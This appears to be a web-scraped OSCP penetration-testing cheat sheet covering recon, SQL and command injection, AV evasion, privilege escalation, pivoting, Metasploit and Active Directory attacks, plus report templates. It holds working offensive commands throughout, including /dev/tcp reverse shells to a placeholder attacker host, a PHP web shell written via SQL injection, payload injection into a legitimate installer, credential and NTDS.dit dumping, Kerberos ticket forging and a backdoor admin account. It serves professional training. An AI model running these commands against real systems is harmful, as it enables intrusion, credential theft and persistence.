You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
1. SCOPING & ENGAGEMENT RULES
Define in-scope IPs/domains, forbidden actions, emergency contacts
2. INFORMATION GATHERING
Passive (no target interaction) then Active (direct interaction)
3. VULNERABILITY SCANNING
Automated discovery + manual validation
4. EXPLOITATION
Gain initial access / foothold
5. POST-EXPLOITATION
Situational awareness, credential harvesting, loot
6. PRIVILEGE ESCALATION
User → Root / SYSTEM / Domain Admin
7. LATERAL MOVEMENT / PIVOTING
Move to other hosts, internal networks
8. REPORTING
Document every step with timestamped evidence
OffSec Core Mindsets
Try Harder — exhaust every option before moving on
Enumerate more — most OSCP failures come from incomplete enumeration
No magic bullets — methodology > tool dependency
Document everything — if it is not written down, it did not happen
02 Report Writing
Note-Taking Best Practices
Screenshot immediately after every significant action
Every proof screenshot must show: whoami + hostname + ip a / ipconfig + flag content in ONE frame
Recommended tools: Obsidian, CherryTree, Notion
Organize notes per host: IP / ports / services / vulns / exploit / loot
Penetration Test Report Structure
1. Cover Page — title, date, client, assessor
2. Executive Summary — business-level risk, top findings, immediate actions
3. Scope — IPs, domains, testing window, rules of engagement
4. Methodology — black/gray/white box, tools used
5. Attack Narrative — step-by-step story with all evidence
6. Technical Findings — per vuln: severity, CVSS, description, evidence, remediation
7. Appendices — raw tool output, exploit code, references
Finding Severity Ratings
Severity
CVSS Range
Example
Critical
9.0-10.0
Unauthenticated RCE
High
7.0-8.9
Auth RCE, privesc
Medium
4.0-6.9
SQLi (no RCE), XSS stored
Low
0.1-3.9
Info disclosure
Info
0.0
Missing security header
03 Information Gathering — Passive Recon
Collect information without touching the target directly.
WHOIS Enumeration
# Domain lookup
whois domain.com
whois domain.com -h <whois-server># Reverse IP lookup
whois 203.0.113.10
# What to look for:# Registrant name / email / phone# Name servers (NS records) — reveal hosting provider# Registration and expiry dates# Admin contact info for social engineering
# URL: https://searchdns.netcraft.com/
# Shows: web server technology, IP history, subdomains, SSL cert details,
# hosting provider, site registration date
# Enter target domain and review all tabs
Shodan
# URL: https://www.shodan.io/# Best passive recon tool for internet-facing infrastructure# CLI
shodan init <API_KEY>
shodan search "hostname:target.com"
shodan search "org:\"Target Company\""
shodan host <IP># Useful Shodan filters:
hostname:target.com
org:"Company Name"
net:192.168.1.0/24
port:22
os:"Windows Server 2019"
product:"Apache httpd"
ssl.cert.subject.cn:"target.com"
http.favicon.hash:<hash># find same app on other IPs
:: Windows built-ins — no tools needednet user :: Local users
net user /domain :: Domain users
net group /domain :: Domain groups
net group"Domain Admins" /domain :: DA members
net localgroup administrators :: Local admins
net share :: Shared folders
systeminfo :: OS, patches, architecture
ipconfig /all :: Network config
arp -a :: Arp cache (neighbours)
netstat -ano :: Ports + PIDs
tasklist /SVC :: Processes with services
wmic product get name,version :: Installed software
cmdkey /list :: Saved credentials
# Linux built-ins
id; whoami; hostname; uname -a; cat /etc/os-release
cat /etc/passwd; cat /etc/group
ip a; ip route; ss -antup; arp -a
ps aux
find / -name "*.conf"2>/dev/null | head -20
# Injection characters;# Run after|# Pipe&&# Run if previous succeeds||# Run if previous fails`cmd`# Backtick exec$(cmd)# Subshell exec
%0a # URL newline# Test payloads (insert into form fields); id
| id
; cat /etc/passwd
$(cat /etc/passwd)# Blind detection (out-of-band); ping -c 3 <LHOST>; curl http://<LHOST>/
; nslookup <LHOST># Reverse shell via command injection; bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
07 SQL Injection
SQLi Types
In-band / Error-based → error messages reveal DB data
In-band / UNION-based → extract data via UNION SELECT
Blind / Boolean-based → different responses for true/false
Blind / Time-based → SLEEP() delays indicate injection
Manual Injection
-- Detection''''OR'1'='1'OR1=1--' OR 1=1#1'ORDER BY1--1' ORDER BY 2--1'ORDER BY3-- -- error reveals column count-- UNION-based: find column count' UNION SELECT NULL--'UNIONSELECTNULL,NULL--' UNION SELECT NULL,NULL,NULL---- Find text columns'UNIONSELECT'a',NULL--' UNION SELECT NULL,'a'---- Extract data (MySQL)'UNIONSELECT user(),database()--' UNION SELECT @@version,NULL--'UNIONSELECT table_name,NULLFROMinformation_schema.tables--' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--'UNIONSELECT username,password FROM users---- MSSQL'; SELECT @@version--'; EXEC xp_cmdshell('whoami')---- Enable xp_cmdshell (MSSQL)'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;---- MySQL file operations' UNION SELECT LOAD_FILE('/etc/passwd'),NULL--'UNIONSELECTNULL,"<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php'--
# Common exploit issues and fixes:# 1. Wrong LHOST/LPORT — grep for hardcoded values, replace# 2. Python 2 vs 3 issues:# print "x" → print("x")# raw_input() → input()# urllib2 → urllib.request# 3. Cross-compile Windows exploit on Linux
i686-w64-mingw32-gcc exploit.c -o exploit32.exe
x86_64-w64-mingw32-gcc exploit.c -o exploit64.exe -lws2_32 # with WinSock# 4. Replace shellcode# Generate new shellcode for your LHOST:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 -f c -b "\x00"# Replace the shellcode bytes in the exploit
10 Antivirus Evasion
AV Detection Methods
Signature-based Matches known malware byte patterns
Heuristic Detects suspicious behavioral patterns
Sandboxing Executes file in isolated environment and observes
Machine Learning AI-based anomaly detection
# Injects shellcode into a legitimate Windows PE file
shellter
# Interactive:# Operation Mode: A (Automatic)# PE Target: /path/to/WinRAR-installer.exe# Enable Stealth Mode: Y# Use a listed payload: L# Select: windows/meterpreter/reverse_tcp# Enter LHOST and LPORT# Test payload (do NOT upload to VirusTotal — AV vendors get the sample)# Use: https://antiscan.me/ (private testing)
sudo -l # Always check first# GTFOBins for sudo: https://gtfobins.github.io/#+sudo# Common examples:
sudo find . -exec /bin/bash \; -quit # find
sudo python3 -c 'import os; os.system("/bin/bash")'# python
sudo vim -c ':!/bin/bash'# vim
sudo awk 'BEGIN {system("/bin/bash")}'# awk
sudo less /etc/passwd → !/bin/bash # less (inside pager)
sudo nano → Ctrl+R Ctrl+X → reset; sh 1>&02>&0# nano
Cron Job Abuse
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
./pspy64 # Watch cron jobs fire in real-time# If cron runs a script you can write to:echo'bash -i >& /dev/tcp/<LHOST>/4444 0>&1'>> /path/to/cron_script.sh
chmod +x /path/to/cron_script.sh
# Start listener and wait# PATH hijack in cron:# If cron PATH includes /tmp and script uses relative binary name:echo'#!/bin/bash'> /tmp/targetbinary
echo'chmod +s /bin/bash'>> /tmp/targetbinary
chmod +x /tmp/targetbinary
# Wait for cron → bash -p
# Expose internal port back to attacker (when target is behind firewall)
ssh -R <LHOST_port>:localhost:<victim_local_port> kali@<LHOST># Example: victim exposes its internal port 8080 to attacker's 9090
ssh -R 9090:localhost:8080 kali@<LHOST># Now attacker: curl http://127.0.0.1:9090
Chisel (HTTP Tunneling — Great for Firewall Bypass)
# Download: https://github.com/jpillora/chisel/releases# Attacker
./chisel server -p 8080 --reverse
# Victim
./chisel client <LHOST>:8080 R:socks # SOCKS5 on attacker port 1080
./chisel client <LHOST>:8080 R:9090:127.0.0.1:3306 # Forward specific port# Use proxychains: socks5 127.0.0.1 1080
Ligolo-ng (Best for OSCP — Full Tunnel)
# Download: https://github.com/nicocha30/ligolo-ng/releases# Attacker setup
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# Victim (Linux or Windows)
./agent -connect <LHOST>:11601 -ignore-cert
# Attacker console:
session # Select agent
start # Start tunnel
sudo ip route add 192.168.1.0/24 dev ligolo # Route internal network# Now access internal IPs directly from Kali!
nmap 192.168.1.0/24
crackmapexec smb 192.168.1.100
# Reverse listener (for shells from internal machines back to Kali)
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444
Socat Relay
# Listen and forward
socat TCP-LISTEN:8080,fork TCP:192.168.1.100:80
# Chain relay (hop through multiple hosts)
socat TCP-LISTEN:9999,fork TCP:<NEXT_HOP>:9999
DNS Tunneling (dnscat2)
# When only DNS outbound traffic is allowed# Attacker
ruby dnscat2.rb --dns domain=attacker.com,host=<LHOST># Victim
./dnscat2 --dns domain=attacker.com
15 The Metasploit Framework
Core Navigation
sudo msfdb init && msfconsole
search <term># Search modules
use <module path># Load module
info # Module details
show options # Required/optional settings
show payloads # Compatible payloadsset RHOSTS 192.168.1.10
set LHOST tun0
set LPORT 4444
run # Execute (also: exploit)
back # Exit module
sessions -l # List sessions
sessions -i 1 # Interact with session 1
Staged vs Non-Staged
windows/shell_reverse_tcp Non-staged (self-contained, works with nc)
windows/shell/reverse_tcp Staged (requires Metasploit handler)
windows/meterpreter/reverse_tcp Staged Meterpreter (most features)
Use non-staged: small buffers, simple nc listeners
Use staged: Meterpreter needed, reliable connection
Meterpreter Quick Reference
sysinfo; getuid; getpid
ps # Process list
migrate <PID># Migrate for stability
shell # System shell
background # Ctrl+Z — background session# Files
ls;pwd;cd /tmp
upload /kali/file C:\\Windows\\Temp\\file
download C:\\secret.txt /tmp/
# Privilege escalation
getsystem # Try automatic privesc to SYSTEM
getprivs # List current privileges# Credentials
load kiwi
creds_all # Dump all credentials
lsa_dump_sam # Dump SAM# Pivoting
route add 192.168.1.0/24 1 # Route through session 1
use auxiliary/server/socks_proxy
set SRVPORT 1080; run
16 Active Directory — Enumeration
AD Basics
Domain Controller (DC) — Auth server; holds NTDS.dit (all AD data)
Domain — Logical boundary; users, computers, groups
Forest — Collection of domains sharing schema
Trust — Auth relationship between domains
OU — Container for organizing AD objects
GPO — Policy applied to OU (login scripts, restrictions)
SPN — Service Principal Name; used for Kerberos auth
Manual Enumeration
net user /domain
net user<user> /domain
net group /domain
net group"Domain Admins" /domain
net group"Enterprise Admins" /domain
net accounts /domain :: Password policy
nltest /domain_trusts
nltest /dclist:<domain>
PowerView (Most Used in OSCP)
. .\PowerView.ps1 # dot-source to loadGet-DomainGet-DomainControllerGet-DomainPolicyData| Select -Expand SystemAccess # Password policy# UsersGet-DomainUser| Select samaccountname,memberof,description
Get-DomainUser-SPN | Select samaccountname,serviceprincipalname # KerberoastableGet-DomainUser-PreauthNotRequired | Select samaccountname # AS-REP roastable# GroupsGet-DomainGroupGet-DomainGroupMember-Identity "Domain Admins"| Select MemberName
# ComputersGet-DomainComputer| Select name,operatingsystem
Get-DomainComputer-Unconstrained | Select dnshostname # Unconstrained delegation# Local admin accessFind-LocalAdminAccess# Where does our user have local admin?Get-NetLocalGroupMember-ComputerName <host># SharesFind-DomainShareFind-InterestingDomainShareFile-Include *.txt,*.ps1,*.bat,*.xml
# ACL abuseFind-InterestingDomainAcl-ResolveGUIDs
Get-ObjectAcl-SamAccountName <user>-ResolveGUIDs
BloodHound + SharpHound
# Windows collection
.\SharpHound.exe -c All --zipfilename bh.zip
# Linux collection (if domain creds available)
bloodhound-python -d domain.com -u <user> -p <pass> -ns <DC_IP> -c All
# Run BloodHound on Kali
sudo neo4j start
bloodhound &# Login: neo4j / neo4j (change on first login)# Import: drag .zip file into BloodHound# Key pre-built queries:# "Find Shortest Paths to Domain Admins"# "Find All Domain Admins"# "List All Kerberoastable Accounts"# "Find AS-REP Roastable Users"# "Find Principals with DCSync Rights"# "Computers where Domain Users are Local Admin"
# Forge any TGT using krbtgt hash — persistent DA access# Get krbtgt hash via DCSync first# Get domain SID: whoami /user → remove last -XXXX# Mimikatz:
kerberos::golden /user:Administrator /domain:domain.com \
/sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NTLM> /id:500 /ptt
# Impacket:
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <SID> -domain domain.com Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py domain.com/Administrator@<host> -k -no-pass
Silver Ticket
# Forge TGS for specific service (no DC contact needed)# Requires: service account NTLM hash + domain SID# Mimikatz:
kerberos::golden /user:Administrator /domain:domain.com /sid:<SID> \
/target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_NTLM> /ptt
ACL Abuse
# If GenericAll/GenericWrite/ForceChangePassword on a user:$Password=ConvertTo-SecureString'NewPass123!'-AsPlainText -Force
Set-DomainUserPassword-Identity <target_user>-AccountPassword $Password# Add to group (GenericAll on group):Add-DomainGroupMember-Identity "Domain Admins"-Members <our_user>
18 Active Directory — Lateral Movement
PsExec
# Impacket (spawns SYSTEM shell via SMB)
psexec.py domain.com/Administrator:pass@<IP>
psexec.py domain.com/Administrator@<IP> -hashes :<NTLM>
:: Create volume shadow copyvssadmin create shadow /for=C:
:: Extract NTDS.dit (all AD hashes) and SYSTEM hivecopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.bak
:: Transfer to Kali, then dump all hashes:
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Backdoor Account
net user backdoor Password123! /add
net localgroup administrators backdoor /add
net localgroup"Remote Desktop Users" backdoor /add
# Penetration Test Report**Client:** COMPANY NAME
**Assessor:** Your Name
**Date:** YYYY-MM-DD
**Type:** Internal Network / External / Web Application
## Executive Summary
A penetration test was conducted between [DATE] and [DATE] against [SCOPE].
[N] vulnerabilities were identified, including [N] critical findings.
The most severe finding ([TITLE]) allowed [IMPACT]. Immediate remediation
is recommended for all critical and high severity issues.
## Risk Summary| Severity | Count ||----------|-------|| Critical | X || High | X || Medium | X || Low | X |## Key Recommendations1. Patch [critical vuln] on [systems] — IMMEDIATE
2. Disable [insecure protocol/config] — 30 days
3. Implement [monitoring / MFA / segmentation] — 90 days
Technical Finding
## Finding: [Vulnerability Title]| Field | Value ||-------------|----------------------|| Severity | Critical || CVSS | 9.8 || CVE |CVE-XXXX-XXXXX || Host | 192.168.x.x || Port | 445/SMB |### Description[Technical explanation of what the vulnerability is and why it exists.]### Evidence[Command used + output. Screenshot reference.]### Impact
This vulnerability allows an unauthenticated attacker to execute arbitrary
commands as SYSTEM on the target host, leading to full system compromise.
### Remediation1. Apply Microsoft Security Update [KB number]2. Disable SMBv1 if not already done
3. Reference: https://nvd.nist.gov/vuln/detail/CVE-XXXX-XXXXX
Proof of Compromise
## Proof: [HOSTNAME] — [IP ADDRESS]**Access Level:** Root / SYSTEM / Domain Admin
**Method:**[Exploitation technique]### Attack Chain1. Port scan revealed port XX running [service version]2. Exploited [CVE / technique] to gain shell as [user]3. Enumerated [linpeas/winpeas] and identified [privesc vector]4. Escalated via [method] to root/SYSTEM
### Local Flag[user@host]$ cat /home/user/local.txt
d41d8cd98f00b204e9800998ecf8427e
### Root/SYSTEM Flag
root@host:~# id && hostname && ip a && cat /root/proof.txt
uid=0(root) gid=0(root) groups=0(root)
target-host
[ip output]
5d41402abc4b2a76b9719d911017c592
> Screenshot: id + hostname + ip + proof.txt in ONE unedited frame
22 OSCP Exam Checklists
Exam Day Setup
[ ] VPN connected and tested before start
[ ] Note-taking tool open (Obsidian / CherryTree)
[ ] Folder structure per machine: /root/exam/<IP>/
[ ] Listener ready: rlwrap nc -lvnp 443
[ ] HTTP server ready: python3 -m http.server 80
[ ] Tools ready on Kali: linpeas.sh, winpeas.exe, ligolo, chisel
[ ] Wordlists accessible: rockyou.txt, seclists
OSCP Scoring
AD Set (40 points):
Initial foothold on any AD machine → partial
Domain Admin (complete set) → 40 pts
Standalone Machines (20 pts each × 3 = 60 pts):
local.txt (low-privilege shell) → 10 pts
proof.txt (root/SYSTEM) → 10 pts
Minimum to pass: 70 points + submitted report
[ ] Full attack narrative for EVERY machine
[ ] Every command used documented (copy from terminal)
[ ] Screenshots: local.txt + proof.txt per machine
[ ] Screenshots: all major steps (vuln ID → exploit → privesc)
[ ] All custom exploit code included
[ ] Report saved as PDF
[ ] Submitted within 24 hours of exam end
[ ] Submission confirmation email received